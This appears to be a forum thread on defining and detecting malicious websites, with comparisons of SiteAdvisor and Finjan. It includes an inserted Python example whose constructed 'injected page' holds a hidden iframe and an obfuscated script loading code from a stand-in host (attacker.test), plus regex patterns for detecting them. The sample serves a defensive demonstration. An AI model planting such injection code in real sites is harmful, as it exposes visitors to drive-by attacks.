Malicious Sites

Let’s talk malicious sites. Melih will be involved in this thread because Comodo is already investing in a new infrastructure for such sites! :slight_smile:

Josh

So here we are talking about web-based threats, whether it be malicious code, exploits, memory, drive-by downloads etc.? NOT on-access scanning? Let’s see where this goes :slight_smile:

Yep. It will be interesting to see what Comodo comes up with. Hence CMF already covers drive-by downloads.

Josh

First question: What is a malicious site?
Second question: How do current products work for identifying these malicious sites?

Third question: What is Comodo trying to do in this segment?

We have many preventative technologies like CMF, D+ etc. What we are working on (it’s a pet project at the moment) is a way to identify a malicious website… So the important thing here is a definition of a malicious site. To us it’s not a site that has malware available for download (as that is harmless until you download and execute it :slight_smile: ), but a site that proactively attacks you, using the many different methods/techniques available!

Melih

A malicious site is one that is malicious itself and/or can redirect you to one or more malware-specific sites that can harm your PC, including drive-by downloads, pop-ups, injections, etc.

They usually scan the site and warn you not to go in there before you enter the site (SiteAdvisor, LinkScanner).

I am guessing Comodo will let users enter the site, but only allow you to go to trustworthy areas; then if something is malicious, the project you’re creating will catch it.

Josh

Well, most certainly one type of malicious site is one that tricks you into giving out too much personal information (for no purpose other than reselling the info). Such as a “survey,” or “fill out this form” with your vital info “so you can enter our site,” etc.

The question is: what do they use to scan the site?
Just the standard AV they have, checking the files on the site, or something else?

Melih

McAfee would use user-submitted sites & probably their own database of malware.

Josh

Make a whitelist?

So many bad sites are appearing these days…
Even typing “http://forums.comod.com/” can be dangerous…
if a user does not know what to expect the website to “appear” like.
I myself have been trying to make a whitelist; currently I have over a million websites…
A blacklist will only get bigger and bigger, whereas a whitelist… clearly increases slowly…

Possibly make an automated server scanner… which, once you visit infected.com/index.html… index.html is broken down and goes through
a system that Comodo has set up, which scans and “examines” it…
before it even goes to the “customer/user” machine?

Or even just make an automated system…
which does the following…
Once you visit a webpage it “puts it into a virtual mode (so to speak) for a limited time until it has been examined by a product (e.g. CMF, CAVS, CFP, Defense)**”
and after this limited time it automatically disables the “virtual mode”… for the user to download/interact with the webpage… and if it is a no-no site it will notify the user about it, and if it’s a FP the user can send a report to Comodo…

** Creates a log if it can/will potentially infect/intrude the user’s machine

I’ll have more ideas …

Sorry for the bad English/spelling,
I’m kind of smashed tonight…

CG

Or even make a Comodo browser…

Haha, soon you’ll be able to make a Windows XP Comodo version lol

To minimize entering possible threat sites, I use McAfee SiteAdvisor…


Whitelist? I don’t think that could be possible for websites; they can just be hijacked and then the user will think the site is safe. Some scripts/code can “steal” your saved passwords in your browser (I think).

If you stealth a port on your PC it just doesn’t answer or respond to the ping. Maybe there could be a way to “stealth” the browser in certain aspects so that it does not respond to suspicious requests.

I agree… this is a problem with e.g. NoScript in Firefox, where you build your own whitelist. If these websites get hijacked you may be vulnerable because NS won’t stop any attacks.

Question: I’ve automatically allowed Opera in D+ by using Clean PC Mode. Now, if I visit a malicious site, will this site be able to make Opera do nasty things on my PC? Or will D+ stop this? At least D+ warns me every time Opera downloads an .exe file. I’m really interested in knowing this - to which extent would D+ stop things that try to sneak out of the D+ safe-listed Opera.

LA

The problem with SiteAdvisor and similar tools (excluding LinkScanner and Finjan) is that they base their warnings on a database. Meaning that if a site was tagged GREEN yesterday, today the site might already be infected and such tools will still give it a GREEN tag.

If you ask me, such tools give a false sense of security.
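As an added illustration of the two concerns raised above (a whitelisted site being hijacked, and a database-only advisor still answering GREEN from yesterday’s crawl), here is a small Python model of the difference between a stored reputation verdict and inspecting the page actually delivered at visit time. This is example code written for this thread, not code from Comodo, Finjan or McAfee; the domains (`example.test`, `attacker.test`), the timestamps, the pages and the regular expressions are all constructed, and the indicators (a hidden iframe, a `document.write(unescape(...))` wrapper) are simple heuristics rather than a real content-inspection engine.

```python
"""
Stale reputation verdict vs. live content inspection (constructed example).

A reputation database stores one verdict per site from the last crawl. If the
site is compromised afterwards, the database keeps answering with the old
verdict until the next crawl. Inspecting the content delivered at visit time
sees the change immediately.

All domains, timestamps and pages below are constructed for this example.
"""
import re
from datetime import datetime, timedelta

# Constructed reputation database: domain -> (verdict, time of last crawl).
# "example.test" was crawled yesterday and found clean (GREEN).
NOW = datetime(2008, 3, 2, 12, 0)
REPUTATION_DB = {
    "example.test": ("green", NOW - timedelta(days=1)),
    "known-bad.test": ("red", NOW - timedelta(days=3)),
}

# Constructed page as it looked when it was crawled (clean).
CLEAN_PAGE = """<html><head><title>Example</title></head>
<body><h1>Welcome</h1><p>Nothing to see here.</p></body></html>"""

# Constructed page as served today: the same site with an injected hidden
# iframe and an obfuscated script, the usual shape of an injection on a
# hijacked site. The "payload" is a placeholder URL, not a real exploit.
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://attacker.test/x" width="0" height="0" '
    'style="visibility:hidden"></iframe>\n'
    "<script>document.write(unescape('%3Cscript%20src%3D%22"
    "http://attacker.test/l.js%22%3E%3C/script%3E'))</script>\n"
    "</body>",
)

# Indicators of injected content (illustrative heuristics, not a full engine).
IFRAME_RE = re.compile(r"<iframe[^>]*>", re.I)
HIDDEN_RE = re.compile(
    r'width=["\']?0["\']?|height=["\']?0["\']?|display:\s*none|visibility:\s*hidden',
    re.I,
)
OBFUSCATED_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(|eval\s*\(\s*unescape\s*\(|String\.fromCharCode\s*\(",
    re.I,
)


def database_verdict(domain, db=REPUTATION_DB):
    """What a database-only advisor answers: the stored verdict, regardless of
    what the site serves right now. Unknown domains get 'unknown'."""
    verdict, _ = db.get(domain, ("unknown", None))
    return verdict


def inspect_content(html):
    """Live inspection of the delivered page. Returns a list of findings;
    an empty list means nothing suspicious was seen."""
    findings = []
    for tag in IFRAME_RE.findall(html):
        if HIDDEN_RE.search(tag):
            findings.append("hidden iframe: " + tag)
    if OBFUSCATED_RE.search(html):
        findings.append("obfuscated script (write/eval of unescape or fromCharCode)")
    return findings


def assess(domain, html, db=REPUTATION_DB, max_age=timedelta(hours=6), now=NOW):
    """Combine both sources. A GREEN database verdict is only trusted while it
    is fresh; the content delivered now is always inspected."""
    verdict, crawled_at = db.get(domain, ("unknown", None))
    stale = crawled_at is None or now - crawled_at > max_age
    findings = inspect_content(html)
    if findings or verdict == "red":
        final = "suspicious"
    elif verdict == "green" and not stale:
        final = "green"
    else:
        final = "unknown"
    return {"domain": domain, "db_verdict": verdict, "db_stale": stale,
            "findings": findings, "verdict": final}


if __name__ == "__main__":
    # Database-only advisor: still GREEN, because it only knows yesterday's crawl.
    print("database says:", database_verdict("example.test"))
    # Live inspection of what is actually served today flags the injection.
    print("live assessment:", assess("example.test", INJECTED_PAGE))
```

The point of the model is the `assess` decision: a stored GREEN is downgraded to "unknown" once it is older than `max_age`, and any finding in the live content overrides the stored verdict, so a hijacked whitelisted site is caught the first time its injected page is served rather than at the next scheduled crawl.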

Hey LA, when using Firefox I am alerted once Firefox has installed a plugin. Maybe this is the same for Opera if it’s changed?

DarkButterfly

I’m aware of that. It’s better to have SiteAdvisor than not to have it at all… SiteAdvisor is for my reference only.


Taken from the Finjan site:

Finjan SecureBrowsing™ is an innovative security assistance tool that proactively alerts you when browsing the Web.
It provides you with “security in-the-cloud” by inspecting webpages before you visit them.
Before you access content, it notifies you about potential malicious content hiding behind links of search results, ads and other selected webpages. Finjan SecureBrowsing accesses each of the links and then scans the relevant pages in real time. It uses Finjan’s patented active real-time content inspection technology as well as the anti-virus engine from Kaspersky®. Once the scan is completed, a safety rating is displayed next to the scanned link.

Today’s cybercriminals use the web as a highly effective attack vector for a wide range of illegitimate and malicious activities, including identity theft through keylogging, financial fraud, espionage, and intelligence gathering. As a result, no organization, corporate network or user PC is safe. Finjan’s patented active real-time content inspection technology protects against Crimeware, Web 2.0 attacks, Spyware, Trojans and other malicious content entering corporate networks. It protects the web surfer from accessing webpages containing malicious content that could be used to steal personal and business data and information.

It appears that Finjan utilises a combination of traditional AV scanning and some form of behavioural model to assess sites. Their content scanning methodology is explained in more detail here:

http://securebrowsing.finjan.com/about.html

The question is: do they simply check the files that exist on that site?

Melih

What does SiteAdvisor check for?

Melih

I think it’s similar to Comodo’s Verification Engine ??? Or am I wrong ?

McAfee SiteAdvisor™ is a security add-on for your Internet Explorer browser that helps you identify sites that are linked to spyware, adware, spam, viruses, browser-based attacks, phishing, or online fraud.
The McAfee SiteAdvisor service is based on a huge database with detailed test results for more than 100,000 pieces of software and covers more than 95% of the world’s Web traffic.
The program integrates with search engine results from popular search engines and also adds an icon to the browser toolbar that indicates whether a site is safe to use, or should be used with caution.
If McAfee SiteAdvisor has negative information for a site, you can review a very detailed report that shows any spam received from that site, harmful downloads, and association with other sites.